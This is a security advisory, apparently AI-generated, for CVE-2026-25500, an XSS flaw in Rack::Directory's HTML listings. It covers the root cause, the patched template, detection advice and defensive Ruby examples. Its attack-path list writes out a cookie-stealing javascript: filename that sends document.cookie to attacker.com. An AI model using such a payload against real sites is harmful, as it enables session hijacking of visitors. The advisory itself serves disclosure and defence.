CVE-2026-25500 Overview
CVE-2026-25500 is a Cross-Site Scripting (XSS) vulnerability in Rack, the modular Ruby web server interface. The vulnerability exists in the Rack::Directory component, which generates HTML directory indexes. When a file exists on disk with a basename starting with the javascript: scheme (e.g., javascript:alert(1)), the generated index contains an anchor element whose href attribute is set directly to the malicious filename. Clicking on such an entry executes JavaScript code in the user's browser context.
Critical Impact
Attackers who can create files on the server with specially crafted filenames can execute arbitrary JavaScript in visitors' browsers, potentially leading to session hijacking, credential theft, or further exploitation of authenticated users.
Affected Products
- Rack versions prior to 2.2.22
- Rack versions prior to 3.1.20
- Rack versions prior to 3.2.5
Discovery Timeline
- 2026-02-18 - CVE CVE-2026-25500 published to NVD
- 2026-02-19 - Last updated in NVD database
Technical Details for CVE-2026-25500
Vulnerability Analysis
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), commonly known as Cross-Site Scripting (XSS). The root cause lies in how Rack::Directory constructs hyperlinks in the generated HTML directory listing. When iterating through files in a directory, the component creates anchor tags where the href attribute is populated directly from the filename without proper sanitization or path prefixing.
The attack requires an adversary to have the ability to create files on the server filesystem—this could be through file upload functionality, compromised credentials, or other means. Once a malicious file is created with a name like javascript:alert(1), any user browsing the directory listing will see this as a clickable link that executes JavaScript when clicked.
Root Cause
The vulnerability stems from insufficient output encoding in the DIR_FILE template constant within lib/rack/directory.rb. The original implementation directly interpolates the filename into the href attribute without ensuring it's treated as a relative path. This allows the javascript: URI scheme to be interpreted as executable script rather than a file reference.
Attack Vector
An attacker exploits this vulnerability through the following attack path:
- Gain write access to a directory served by Rack::Directory (via file upload, compromised credentials, or other vectors)
- Create a file with a javascript: prefixed filename containing malicious code (e.g., javascript:document.location='https://attacker.com/steal?cookie='+document.cookie)
- Wait for a victim to browse the directory listing
- When the victim clicks the malicious file entry, the JavaScript executes in their browser context
The fix introduces a ./ prefix in the href attribute, so the filename is always resolved as a relative path and a colon inside it can no longer be read by the browser as a URI scheme delimiter:
# Before (vulnerable):
DIR_FILE = "<tr><td class='name'><a href='%s'>%s</a></td><td class='size'>%s</td><td class='type'>%s</td><td class='mtime'>%s</td></tr>\n"
# After (patched):
DIR_FILE = "<tr><td class='name'><a href='./%s'>%s</a></td><td class='size'>%s</td><td class='type'>%s</td><td class='mtime'>%s</td></tr>\n"
Source: GitHub Rack Commit Change
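To make the effect of that one-character change concrete, here is an added Ruby example (not Rack's own code) that renders a listing row with each template and classifies the resulting href the way a browser resolves it. The reduced templates, the HTML-escaping step and the sample filename are constructed for this illustration.

```ruby
require 'uri'
require 'cgi'

# Reduced forms of the two templates quoted above: only the name cell is kept,
# since that is where the href is built (constructed for this example).
VULNERABLE_DIR_FILE = "<tr><td class='name'><a href='%s'>%s</a></td></tr>"
PATCHED_DIR_FILE    = "<tr><td class='name'><a href='./%s'>%s</a></td></tr>"

# Render one row: the basename is HTML-escaped (an assumption about the caller)
# and interpolated into both the href and the link text. HTML escaping does
# nothing to a javascript: scheme; only the path prefix changes its meaning.
def render_row(template, basename)
  escaped = CGI.escapeHTML(basename)
  format(template, escaped, escaped)
end

# Pull the raw href value back out of a rendered row.
def href_of(row)
  row[/href='([^']*)'/, 1]
end

# Classify an href the way a browser does: a leading scheme (javascript:,
# data:, ...) makes it an absolute URI; a relative reference has no scheme
# and is resolved against the listing URL, so nil is returned here.
def href_scheme(href)
  URI.parse(CGI.unescapeHTML(href)).scheme
rescue URI::InvalidURIError
  nil
end

# Resolve an href against the URL the directory listing was served from.
def resolve_href(listing_url, href)
  URI.join(listing_url, CGI.unescapeHTML(href)).to_s
end

# Constructed sample: a file whose basename is itself a javascript: URI.
SAMPLE_NAME = 'javascript:alert(1)'

if __FILE__ == $PROGRAM_NAME
  [VULNERABLE_DIR_FILE, PATCHED_DIR_FILE].each do |tpl|
    href = href_of(render_row(tpl, SAMPLE_NAME))
    puts "href=#{href.inspect} scheme=#{href_scheme(href).inspect} " \
         "resolves_to=#{resolve_href('http://example.test/files/', href)}"
  end
end
```

With the vulnerable template the href is the bare filename and resolves to the javascript: URI itself; with the patched template it resolves to a path under the listing URL.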
Detection Methods for CVE-2026-25500
Indicators of Compromise
- Files in web-accessible directories with names starting with javascript:, data:, or other executable URI schemes
- Unusual filenames containing HTML entities, script tags, or encoded payloads
- Web server logs showing requests for files with suspicious scheme-prefixed names
Detection Strategies
- Implement file integrity monitoring to detect creation of files with unusual naming patterns in directories served by Rack::Directory
- Deploy web application firewalls (WAF) with rules to detect and block directory traversal or XSS-related patterns in URL paths
- Use static analysis tools to identify use of Rack::Directory in application codebases and verify patched versions are deployed
Monitoring Recommendations
- Monitor file creation events in directories exposed via Rack::Directory for filenames containing URI scheme prefixes
- Enable browser Content Security Policy (CSP) headers to mitigate execution of inline scripts even if XSS is triggered
- Review access logs for directory listing requests followed by anomalous JavaScript-prefixed path requests
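As an added example of the file-level checks listed above (not part of the advisory or of Rack), the following Ruby scanner flags basenames that a browser would read as an absolute URI if placed unprefixed in an href. The scheme list and the sample listing are constructed for this illustration.

```ruby
# A basename that begins with a URI scheme as RFC 3986 defines it: a letter,
# then letters, digits, '+', '-' or '.', then a colon. Placed unprefixed in
# an href, such a name is resolved as an absolute URI instead of a file.
SCHEME_PREFIX = /\A[A-Za-z][A-Za-z0-9+.\-]*:/

# Schemes a browser executes or renders directly; these are the hits worth
# alerting on (constructed list covering the schemes named on this page).
ACTIVE_SCHEMES = %w[javascript data].freeze

# Classify one basename: :active for a scheme in ACTIVE_SCHEMES, :scheme for
# any other scheme-shaped prefix (at best a broken link, still anomalous),
# nil for an ordinary filename. Matching is case-insensitive, as in browsers.
def classify_basename(name)
  m = SCHEME_PREFIX.match(name)
  return nil unless m
  scheme = m[0].chomp(':').downcase
  ACTIVE_SCHEMES.include?(scheme) ? :active : :scheme
end

# Scan a list of basenames and return the flagged ones with their
# classification, :active entries first.
def flag_basenames(names)
  names.filter_map { |n| (c = classify_basename(n)) && [n, c] }
       .sort_by { |_, c| c == :active ? 0 : 1 }
end

# Convenience wrapper for a real directory served by Rack::Directory.
def scan_directory(dir)
  flag_basenames(Dir.children(dir))
end

# Constructed sample listing: two benign names, one attack-shaped name and
# one that is merely scheme-shaped (a colon after a run of letters).
SAMPLE_LISTING = [
  'report-2026.pdf',
  'backup.tar.gz',
  'javascript:alert(1)',
  'notes:draft.txt',
].freeze

if __FILE__ == $PROGRAM_NAME
  flag_basenames(SAMPLE_LISTING).each { |name, c| puts "#{c}\t#{name}" }
end
```

Run scan_directory against each directory mounted under Rack::Directory as part of file integrity monitoring; the :scheme class is noisy by design and is better logged than paged on.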
How to Mitigate CVE-2026-25500
Immediate Actions Required
- Upgrade Rack immediately to 2.2.22, 3.1.20, or 3.2.5 (or a later release in the same series)
- Audit existing directories served by Rack::Directory for files with malicious naming patterns
- Consider disabling Rack::Directory if not strictly required for application functionality
- Implement Content Security Policy headers to reduce XSS impact
Patch Information
The Rack maintainers have released patched versions addressing this vulnerability. The fix is available in versions 2.2.22, 3.1.20, and 3.2.5. The patch modifies the DIR_FILE template in lib/rack/directory.rb to prefix all file links with ./, ensuring filenames are interpreted as relative paths rather than URI schemes.
For detailed patch information, see the GitHub Security Advisory GHSA-whrj-4476-wvmp and the GitHub Rack Commit Change.
Workarounds
- Remove Rack::Directory from the middleware stack if directory listing functionality is not required
- Implement a custom middleware layer that sanitizes filenames before they reach Rack::Directory
- Configure file upload restrictions to reject filenames containing : or other URI scheme indicators
- Use a reverse proxy or web server to serve static files instead of Rack::Directory
# Verify your Rack version and upgrade if necessary
bundle show rack
bundle update rack --conservative
# Or specify a minimum version in the Gemfile (3.2.5 shown; use 2.2.22 or 3.1.20
# for the 2.2 / 3.1 series). If the Gemfile already has a gem 'rack' line, edit
# that line instead of appending a second one, which Bundler rejects.
echo "gem 'rack', '>= 3.2.5'" >> Gemfile
bundle install
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.